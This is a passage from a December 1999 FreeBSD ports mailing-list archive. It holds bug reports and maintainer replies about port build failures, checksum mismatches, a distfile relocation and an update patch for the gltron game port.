ports/15625; it has been noted by GNATS. From: Andrey Zakhvatov To: cpiazza@jaxon.net (Chris Piazza) Cc: freebsd-gnats-submit@freebsd.org Subject: Re: ports/15625: Update port: devel/libgnugetopt Date: Thu, 23 Dec 1999 09:35:25 +0300 (MSK) Hello, > Tripod seems to be truncating my download. Maybe you can put the distfile > in ~andy/public_html and use http://www.freebsd.org/~andy/ as the > MASTER_SITE? Done. Thanx for reminder. It seems tripod trancate files like crazy ;) Can you fix port's Makefile? Sincerely yours, Andy. -- Tel: +7-(3512)-38-39-73, E-mail: andy@icc.surw.chel.su WWW: http://surw.chel.su/~andy/index.html, ICQ:10705306 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 22:40: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DE5DF155ED for ; Wed, 22 Dec 1999 22:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA83262; Wed, 22 Dec 1999 22:40:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pele.WURLDLINK.NET (pele.WURLDLINK.NET [208.164.68.2]) by hub.freebsd.org (Postfix) with ESMTP id BB64314F3F for ; Wed, 22 Dec 1999 22:39:06 -0800 (PST) (envelope-from vince@pele.WURLDLINK.NET) Received: (from root@localhost) by pele.WURLDLINK.NET (8.9.3/8.9.3) id UAA27051; Wed, 22 Dec 1999 20:39:13 -1000 (HST) (envelope-from vince) Message-Id: <199912230639.UAA27051@pele.WURLDLINK.NET> Date: Wed, 22 Dec 1999 20:39:13 -1000 (HST) From: Vincent Poy Reply-To: vince@pele.WURLDLINK.NET To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15640: rc5des port fails to build Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15640 >Category: ports >Synopsis: rc5des port fails to build >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 22 22:40:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Vincent Poy >Release: FreeBSD 4.0-CURRENT i386 >Organization: Wurldlink Corporation - San Francisco -Honolulu - Hong Kong >Environment: 4.0-CURRENT and 3.0-RELEASE >Description: rc5des port fails to build >How-To-Repeat: root@victor [10:32pm][/usr/ports/misc/rc5des] >> make ===> Extracting for rc5des-2.7106.444 >Fix: Unknown >Release-Note: >Audit-Trail: >Unformatted: >> Checksum OK for rc5des444-freebsd-x86-elf.tar.gz. ===> Patching for rc5des-2.7106.444 ===> Configuring for rc5des-2.7106.444 if [ ! -f /usr/local/distributed.net/rc5des.ini ]; then install -c -m 644 /usr/ports/misc/rc5des/files/rc5des.ini /usr/ports/misc/rc5des/work; /usr/ports/misc/rc5des/work/rc5des -config; fi RC5DES client - a project of distributed.net Copyright 1997-1999 distributed.net DES bitslice driver Copyright 1997-1998, Andrew Meggs DES sboxes routines Copyright 1997-1998, Matthew Kwan DES search routines Copyright 1997-1998, Svend Olaf Mikkelsen Please visit http://www.distributed.net/ for up-to-date contest information. Start the client with '-help' for a list of valid command line options. RC5DES Client Configuration: -------------------------------------------------------------------------- 1) General Client Options 2) Buffer and Buffer Update Options 3) Performance and Processor Options 4) Logging Options 9) Discard settings and exit 0) Save settings and exit Choice --> Stopped (tty output) *** Error code 150 Stop. *** Error code 1 Stop. *** Error code 1 Stop. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 22 22:50: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6501514FD2 for ; Wed, 22 Dec 1999 22:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA83942; Wed, 22 Dec 1999 22:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pele.WURLDLINK.NET (pele.WURLDLINK.NET [208.164.68.2]) by hub.freebsd.org (Postfix) with ESMTP id 7686D14FD2 for ; Wed, 22 Dec 1999 22:44:15 -0800 (PST) (envelope-from vince@pele.WURLDLINK.NET) Received: (from root@localhost) by pele.WURLDLINK.NET (8.9.3/8.9.3) id UAA27275; Wed, 22 Dec 1999 20:44:23 -1000 (HST) (envelope-from vince) Message-Id: <199912230644.UAA27275@pele.WURLDLINK.NET> Date: Wed, 22 Dec 1999 20:44:23 -1000 (HST) From: Vincent Poy Reply-To: vince@pele.WURLDLINK.NET To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15641: rzsz port no longer compiles because checksum changed Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15641 >Category: ports >Synopsis: rzsz port no longer compiles because checksum changed >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Dec 22 22:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Vincent Poy >Release: FreeBSD 4.0-CURRENT i386 >Organization: Wurldlink Corporation - San Francisco - Honolulu - Hong Kong >Environment: 4.0-CURRENT and 3.3-RELEASE >Description: rzsz port no longer compiles because checksum changed >How-To-Repeat: root@victor [10:43pm][/usr/ports/comms/rzsz] >> make ===> Extracting for rzsz-3.50 >Fix: Unknown >Release-Note: >Audit-Trail: >Unformatted: >> Checksum mismatch for rzsz.zip. Make sure the Makefile and md5 file (/usr/ports/comms/rzsz/files/md5) are up to date. If you want to override this check, type "make NO_CHECKSUM=yes [other args]". *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 0: 0: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A9B1214E0C for ; Thu, 23 Dec 1999 00:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA88337; Thu, 23 Dec 1999 00:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pele.WURLDLINK.NET (pele.WURLDLINK.NET [208.164.68.2]) by hub.freebsd.org (Postfix) with ESMTP id F130914DC1 for ; Wed, 22 Dec 1999 23:58:13 -0800 (PST) (envelope-from vince@pele.WURLDLINK.NET) Received: (from root@localhost) by pele.WURLDLINK.NET (8.9.3/8.9.3) id VAA32775; Wed, 22 Dec 1999 21:58:21 -1000 (HST) (envelope-from vince) Message-Id: <199912230758.VAA32775@pele.WURLDLINK.NET> Date: Wed, 22 Dec 1999 21:58:21 -1000 (HST) From: Vincent Poy Reply-To: vince@pele.WURLDLINK.NET To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15642: tund port build failure Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15642 >Category: ports >Synopsis: tund port build failure >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Dec 23 00:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Vincent Poy >Release: FreeBSD 4.0-CURRENT i386 >Organization: Wurldlink Corporation - San Francisco - Honolulu - Hong Kong >Environment: 4.0-CURRENT and 3.3-RELEASE >Description: tund port build failure >How-To-Repeat: root@victor [11:53pm][/usr/ports/net/tund] >> make clean ; make install ===> Cleaning for openssl-0.9.4 ===> Cleaning for tund-0.20 >Fix: Unknown >Release-Note: >Audit-Trail: >Unformatted: >> tund-0.20.tar.gz doesn't seem to exist on this system. >> Attempting to fetch from ftp://ftp.chg.ru/pub/networking/freebsd/. Receiving tund-0.20.tar.gz (13876 bytes): 100% 13876 bytes transferred in 2.6 seconds (5.31 Kbytes/s) ===> Extracting for tund-0.20 >> Checksum OK for tund-0.20.tar.gz. ===> tund-0.20 depends on file: /usr/local/lib/libcrypto.a - found ===> Patching for tund-0.20 ===> Applying FreeBSD patches for tund-0.20 ===> Configuring for tund-0.20 ===> Building for tund-0.20 cc -g -DDEBUG -o rsa_kg rsa_kg.c -I/usr/local/include -L/usr/local/lib -lcrypto /usr/local/lib/libcrypto.so: undefined reference to `ERR_load_RSAREF_strings' /usr/local/lib/libcrypto.so: undefined reference to `RSA_PKCS1_RSAref' *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 0:47: 9 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 707C414EE7; Thu, 23 Dec 1999 00:47:05 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA92283; Thu, 23 Dec 1999 00:47:04 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Thu, 23 Dec 1999 00:47:04 -0800 (PST) From: Message-Id: <199912230847.AAA92283@freefall.freebsd.org> To: cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org, dbaker@FreeBSD.org Subject: Re: ports/15640: rc5des port fails to build Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: rc5des port fails to build Responsible-Changed-From-To: freebsd-ports->dbaker Responsible-Changed-By: cpiazza Responsible-Changed-When: Thu Dec 23 00:46:53 PST 1999 Responsible-Changed-Why: Over to maintainre To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 0:50:56 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0A85F14DC6; Thu, 23 Dec 1999 00:50:22 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA92636; Thu, 23 Dec 1999 00:50:21 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Thu, 23 Dec 1999 00:50:21 -0800 (PST) From: Message-Id: <199912230850.AAA92636@freefall.freebsd.org> To: andy@icc.surw.chel.su, cpiazza@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15625: Update port: devel/libgnugetopt Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: devel/libgnugetopt State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Thu Dec 23 00:50:11 PST 1999 State-Changed-Why: Updated, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 1: 1: 0 1999 Delivered-To: freebsd-ports@freebsd.org Received: from ady.warpnet.ro (ady.warpnet.ro [194.102.224.1]) by hub.freebsd.org (Postfix) with ESMTP id 2ED6314CB8 for ; Thu, 23 Dec 1999 01:00:34 -0800 (PST) (envelope-from ady@freebsd.ady.ro) Received: from localhost (ady@localhost) by ady.warpnet.ro (8.9.3/8.9.3) with ESMTP id LAA16421; Thu, 23 Dec 1999 11:02:47 +0200 (EET) (envelope-from ady@freebsd.ady.ro) Date: Thu, 23 Dec 1999 11:02:47 +0200 (EET) From: Adrian Penisoara X-Sender: ady@ady.warpnet.ro To: Akinori MUSHA aka knu Cc: freebsd-ports@FreeBSD.org Subject: Re: ports/14359: Update port: mail/imap-uw In-Reply-To: <86ogbj2fb0.wl@localhost.local.idaemons.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, On Wed, 22 Dec 1999, Akinori MUSHA aka knu wrote: > Hi! > > Thanks! I've been so busy on my work I cannot take my time out > hacking imap-utils... But I'm trying your new port, which seems > working just fine! (I did 'make PAMAUTH=yes install') That's good news! > > However, I've got something to point out, you know, imap-utils > seem to be distributed *unofficially* as you can see the file called > imap-utils.tar.Z isn't laid statically, that is to say, its md5 > checksum will change irregularly. A headache. That's bad news... Yep, the same thing we had with imap source tarball once in a while, when it was in beta stage. I'll try talking to the author, maybe he could do us a favour (like giving versions to the imap-utils package, moving the mlock sources into the main source tarball, etc.). > > Maybe we must have another master site to put the snapshots of > it like imap-utils-4.7.tar.Z, imap-utils-4.8.tar.Z, etc? (Yes, .gz or > .bz2 would be better) Hmm, we tried that when imap was in beta, Steve was holding a snapshot of the tarball on his homepage -- but then we had other (minor) problems... But wait, isn't there an option to convince the port not to verify the checksum for some of the source tarballs ? Ady (@freebsd.ady.ro) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 1:40: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7C21D15036 for ; Thu, 23 Dec 1999 01:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA95833; Thu, 23 Dec 1999 01:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pele.WURLDLINK.NET (pele.WURLDLINK.NET [208.164.68.2]) by hub.freebsd.org (Postfix) with ESMTP id 9D15B14ED6 for ; Thu, 23 Dec 1999 01:32:09 -0800 (PST) (envelope-from vince@pele.WURLDLINK.NET) Received: (from root@localhost) by pele.WURLDLINK.NET (8.9.3/8.9.3) id XAA46457; Wed, 22 Dec 1999 23:32:18 -1000 (HST) (envelope-from vince) Message-Id: <199912230932.XAA46457@pele.WURLDLINK.NET> Date: Wed, 22 Dec 1999 23:32:18 -1000 (HST) From: Vincent Poy Reply-To: vince@pele.WURLDLINK.NET To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15643: bjorb port fails to build Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15643 >Category: ports >Synopsis: bjorb port fails to build >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Dec 23 01:40:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Vincent Poy >Release: FreeBSD 4.0-CURRENT i386 >Organization: WUrldlink Corporation - San Francisco - Honolulu - Hong Kong >Environment: 4.0-CURRENT and 3.3-RELEASE >Description: bjorb port fails to build >How-To-Repeat: root@victor [1:20am][/usr/ports/security/bjorb] >> make clean ; make install ===> Cleaning for openssl-0.9.4 ===> Cleaning for rsaref-2.0 ===> Cleaning for bjorb-0.5.5p1 >Fix: Unknown >Release-Note: >Audit-Trail: >Unformatted: >> bjorb-0.5.5p1.tar.gz doesn't seem to exist on this system. >> Attempting to fetch from ftp://ftp.hitachi-ms.co.jp/pub/bjorb/. Receiving bjorb-0.5.5p1.tar.gz (70151 bytes): 100% 70151 bytes transferred in 2.4 seconds (28.12 Kbytes/s) ===> Extracting for bjorb-0.5.5p1 >> Checksum OK for bjorb-0.5.5p1.tar.gz. ===> bjorb-0.5.5p1 depends on executable: openssl - found ===> bjorb-0.5.5p1 depends on shared library: crypto.1 - found ===> bjorb-0.5.5p1 depends on shared library: ssl.1 - found ===> Patching for bjorb-0.5.5p1 ===> Applying FreeBSD patches for bjorb-0.5.5p1 ===> Configuring for bjorb-0.5.5p1 creating cache ./config.cache checking for mawk... no checking for gawk... no checking for nawk... no checking for awk... awk checking for ranlib... ranlib checking for a BSD compatible install... /usr/bin/install -c -o root -g wheel checking for gcc... cc checking whether the C compiler (cc -O -pipe -I/usr/local/include/openssl ) works... yes checking whether the C compiler (cc -O -pipe -I/usr/local/include/openssl ) is a cross-compiler... no checking whether we are using GNU C... yes checking whether cc accepts -g... yes checking whether make sets ${MAKE}... yes checking for sh... /bin/sh checking for ld... /usr/bin/ld checking how to run the C preprocessor... cc -E checking for /usr/local/include/ssl.h... no checking for string.h... yes checking for sys/types.h... yes checking for errno.h... yes checking for strerror... yes checking for sys/wait.h... yes checking for waitpid... yes checking for wait3... yes checking for union wait... no checking for socket in -lsocket... no checking for gethostbyaddr in -lnsl... no checking for ERR_load_RSAREF_strings in -lRSAglue... no checking for DES3_CBCInit in -lrsaref... no updating cache ./config.cache creating ./config.status creating util/Makefile creating Makefile creating token/Makefile creating common.h creating config.h ===> Building for bjorb-0.5.5p1 cc -c -O -pipe -I/usr/local/include/openssl -DHAVE_CONFIG_H -I/usr/local/include -I. main.cc cc -c -O -pipe -I/usr/local/include/openssl -DHAVE_CONFIG_H -I/usr/local/include -I. log.cc cc -c -O -pipe -I/usr/local/include/openssl -DHAVE_CONFIG_H -I/usr/local/include -I. sig.cc cc -c -O -pipe -I/usr/local/include/openssl -DHAVE_CONFIG_H -I/usr/local/include -I. Config-staff.cc cc -c -O -pipe -I/usr/local/include/openssl -DHAVE_CONFIG_H -I/usr/local/include -I. Config.cc cc -c -O -pipe -I/usr/local/include/openssl -DHAVE_CONFIG_H -I/usr/local/include -I. cmdexec.cc cc -c -O -pipe -I/usr/local/include/openssl -DHAVE_CONFIG_H -I/usr/local/include -I. acl.cc cc -c -O -pipe -I/usr/local/include/openssl -DHAVE_CONFIG_H -I/usr/local/include -I. portinfo.cc cc -c -O -pipe -I/usr/local/include/openssl -DHAVE_CONFIG_H -I/usr/local/include -I. parse.c cc -c -O -pipe -I/usr/local/include/openssl -DHAVE_CONFIG_H -I/usr/local/include -I. cmd.cc cc -c -O -pipe -I/usr/local/include/openssl -DHAVE_CONFIG_H -I/usr/local/include -I. portoption.cc cc -c -O -pipe -I/usr/local/include/openssl -DHAVE_CONFIG_H -I/usr/local/include -I. Socket.cc cc -c -O -pipe -I/usr/local/include/openssl -DHAVE_CONFIG_H -I/usr/local/include -I. bool.cc cc -c -O -pipe -I/usr/local/include/openssl -DHAVE_CONFIG_H -I/usr/local/include -I. servicetype.cc cd token; make CFLAGS="-O -pipe -I/usr/local/include/openssl" cc -c -O -pipe -I/usr/local/include/openssl -I.. -fpic -Wall chomp.c cc -c -O -pipe -I/usr/local/include/openssl -I.. -fpic -Wall getTokenInt.c cc -c -O -pipe -I/usr/local/include/openssl -I.. -fpic -Wall getTokenStr.c cc -c -O -pipe -I/usr/local/include/openssl -I.. -fpic -Wall getTokenStrAll.c cc -c -O -pipe -I/usr/local/include/openssl -I.. -fpic -Wall getTokenStrUntil.c cc -c -O -pipe -I/usr/local/include/openssl -I.. -fpic -Wall skipSpace.c cc -c -O -pipe -I/usr/local/include/openssl -I.. -fpic -Wall skipUntilSpace.c ar r libtoken.a chomp.o getTokenInt.o getTokenStr.o getTokenStrAll.o getTokenStrUntil.o skipSpace.o skipUntilSpace.o ranlib libtoken.a cd util; make CFLAGS="-O -pipe -I/usr/local/include/openssl" cc -c -O -pipe -I/usr/local/include/openssl -I.. -fpic -Wall openSearch.c cc -c -O -pipe -I/usr/local/include/openssl -I.. -fpic -Wall checkOpenFile.c cc -c -O -pipe -I/usr/local/include/openssl -I.. -fpic -Wall addr2str.c cc -c -O -pipe -I/usr/local/include/openssl -I.. -fpic -Wall toLowerString.c cc -c -O -pipe -I/usr/local/include/openssl -I.. -fpic -Wall getTimeStr.c ar r libmsutil.a openSearch.o checkOpenFile.o addr2str.o toLowerString.o getTimeStr.o ranlib libmsutil.a cc -o bjorb -L/usr/local/lib main.o log.o sig.o Config-staff.o Config.o cmdexec.o acl.o portinfo.o parse.o cmd.o portoption.o Socket.o bool.o servicetype.o token/libtoken.a util/libmsutil.a -lssl -lcrypto /usr/local/lib/libcrypto.so: undefined reference to `ERR_load_RSAREF_strings' /usr/local/lib/libcrypto.so: undefined reference to `RSA_PKCS1_RSAref' *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 3: 9: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from iclub.nsu.ru (iclub.nsu.ru [193.124.222.66]) by hub.freebsd.org (Postfix) with ESMTP id E5D2F14D09 for ; Thu, 23 Dec 1999 03:09:01 -0800 (PST) (envelope-from fjoe@iclub.nsu.ru) Received: from localhost (fjoe@localhost) by iclub.nsu.ru (8.9.3/8.9.3) with ESMTP id QAA19804 for ; Thu, 23 Dec 1999 16:55:41 +0600 (NS) (envelope-from fjoe@iclub.nsu.ru) Date: Thu, 23 Dec 1999 16:55:41 +0600 (NS) From: Max Khon To: ports@freebsd.org Subject: xemacs21 port under -stable Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, there! after upgrade from 3.3-RELEASE to 3.4-STABLE xemacs21 (built under 3.3-RELEASE) dumps core (everything else works fine). I have read about something similar under -current but have not found any solution or explanation. Please reply directly. /fjoe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 3:30: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 50059155EF for ; Thu, 23 Dec 1999 03:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA05882; Thu, 23 Dec 1999 03:30:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pele.WURLDLINK.NET (pele.WURLDLINK.NET [208.164.68.2]) by hub.freebsd.org (Postfix) with ESMTP id A918214D06 for ; Thu, 23 Dec 1999 03:29:52 -0800 (PST) (envelope-from vince@pele.WURLDLINK.NET) Received: (from root@localhost) by pele.WURLDLINK.NET (8.9.3/8.9.3) id BAA54807; Thu, 23 Dec 1999 01:30:02 -1000 (HST) (envelope-from vince) Message-Id: <199912231130.BAA54807@pele.WURLDLINK.NET> Date: Thu, 23 Dec 1999 01:30:02 -1000 (HST) From: Vincent Poy Reply-To: vince@pele.WURLDLINK.NET To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15645: firewalk port build fails Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15645 >Category: ports >Synopsis: firewalk port build fails >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Dec 23 03:30:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Vincent Poy >Release: FreeBSD 4.0-CURRENT i386 >Organization: Wurldlink Corporation - San Francisco - Hong Kong - Honolulu >Environment: 4.0-CURRENT and 3.3-RELEASE >Description: firewalk port build fails >How-To-Repeat: root@victor [3:25am][/usr/ports/security/firewalk] >> make clean ; make install ===> Cleaning for libnet-0.99g ===> Cleaning for firewalk-0.9.9b >Fix: Unknown >Release-Note: >Audit-Trail: >Unformatted: >> firewalk-0.99beta.tar.gz doesn't seem to exist on this system. >> Attempting to fetch from http://www.packetfactory.net/firewalk/. Receiving firewalk-0.99beta.tar.gz (75045 bytes): 100% 75045 bytes transferred in 0.4 seconds (168.03 Kbytes/s) ===> Extracting for firewalk-0.9.9b >> Checksum OK for firewalk-0.99beta.tar.gz. ===> firewalk-0.9.9b depends on file: /usr/local/lib/libnet.a - found ===> Patching for firewalk-0.9.9b ===> Applying FreeBSD patches for firewalk-0.9.9b ===> Configuring for firewalk-0.9.9b creating cache ./config.cache checking host system type... i386--freebsd3.3 checking target system type... i386--freebsd3.3 checking build system type... i386--freebsd3.3 checking for gcc... cc checking whether the C compiler (cc -O -pipe -L/usr/local/lib) works... yes checking whether the C compiler (cc -O -pipe -L/usr/local/lib) is a cross-compiler... no checking whether we are using GNU C... yes checking whether cc accepts -g... yes checking how to run the C preprocessor... cc -E checking for a BSD compatible install... /usr/bin/install -c -o root -g wheel checking for build_ip in -lnet... yes checking for pcap_open_live in -lpcap... yes checking for ANSI C header files... yes checking for working const... yes checking whether cc needs -traditional... no checking for strerror... yes updating cache ./config.cache creating ./config.status creating Makefile creating config.h ===> Building for firewalk-0.9.9b sed -e 's/.*/static char version[] = "&";/' ./VERSION > version.h cc -O -pipe -I/usr/local/include -DHAVE_CONFIG_H -c main.c -o main.o In file included from ./main.h:48, from main.c:38: /usr/local/include/libnet.h:89: #error "byte order has not been specified, you'll need to #define either LIBNET_LIL_ENDIAN or LIBNET_BIG_ENDIAN. See the documentation regarding the libnet-config script." *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. *** Error code 1 Stop. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 3:53:29 1999 Delivered-To: freebsd-ports@freebsd.org Received: from mail.scc.nl (node1374.a2000.nl [62.108.19.116]) by hub.freebsd.org (Postfix) with ESMTP id 3E6E414D3F for ; Thu, 23 Dec 1999 03:53:27 -0800 (PST) (envelope-from freebsd-ports@scc.nl) Received: (from daemon@localhost) by mail.scc.nl (8.9.3/8.9.3) id MAA56570 for ports@FreeBSD.org; Thu, 23 Dec 1999 12:42:44 +0100 (CET) (envelope-from freebsd-ports@scc.nl) Received: from GATEWAY by dwarf.hq.scc.nl with netnews for ports@FreeBSD.org (ports@FreeBSD.org) To: ports@FreeBSD.org Date: Thu, 23 Dec 1999 12:42:39 +0100 From: Marcel Moolenaar Message-ID: <38620AAF.CC0DE32C@scc.nl> Organization: SCC vof Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit References: Subject: Re: xemacs21 port under -stable Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Max Khon wrote: > after upgrade from 3.3-RELEASE to 3.4-STABLE xemacs21 (built under > 3.3-RELEASE) dumps core (everything else works fine). > > I have read about something similar under -current > but have not found any solution or explanation. It *always* happens for me on -current. From what I have picked up, it's because xemacs21 is buggy. Just recompile xemacs21 and hope they have a new version soon... -- Marcel Moolenaar mailto:marcel@scc.nl SCC Internetworking & Databases http://www.scc.nl/ The FreeBSD project mailto:marcel@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 5:10: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D326614F22 for ; Thu, 23 Dec 1999 05:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA18583; Thu, 23 Dec 1999 05:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from icc.surw.chel.su (surw.chel.su [195.54.2.162]) by hub.freebsd.org (Postfix) with ESMTP id 75E2914DC5 for ; Thu, 23 Dec 1999 05:05:43 -0800 (PST) (envelope-from andy@icc.surw.chel.su) Received: (from andy@localhost) by icc.surw.chel.su (8.9.3/8.9.3) id QAA50418; Thu, 23 Dec 1999 16:05:28 +0300 (MSK) (envelope-from andy) Message-Id: <199912231305.QAA50418@icc.surw.chel.su> Date: Thu, 23 Dec 1999 16:05:28 +0300 (MSK) From: Andrey Zakhvatov Reply-To: andy@icc.surw.chel.su To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15646: Update port: games/gltron Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15646 >Category: ports >Synopsis: Update port: games/gltron >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Thu Dec 23 05:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Andrey Zakhvatov >Release: FreeBSD 3.3-RELEASE i386 >Organization: South Ural Railway ICC >Environment: >Description: This is a patch to update games/gltron port. diff -Nru gltron/Makefile gltron-0.46/Makefile --- gltron/Makefile Wed Aug 25 14:15:21 1999 +++ gltron-0.46/Makefile Thu Dec 23 15:42:29 1999 @@ -1,13 +1,13 @@ # New ports collection makefile for: gltron -# Version required: 0.43 +# Version required: 0.46 # Date created: 24 July 1999 # Whom: Andrey Zakhvatov # # $FreeBSD: ports/games/gltron/Makefile,v 1.3 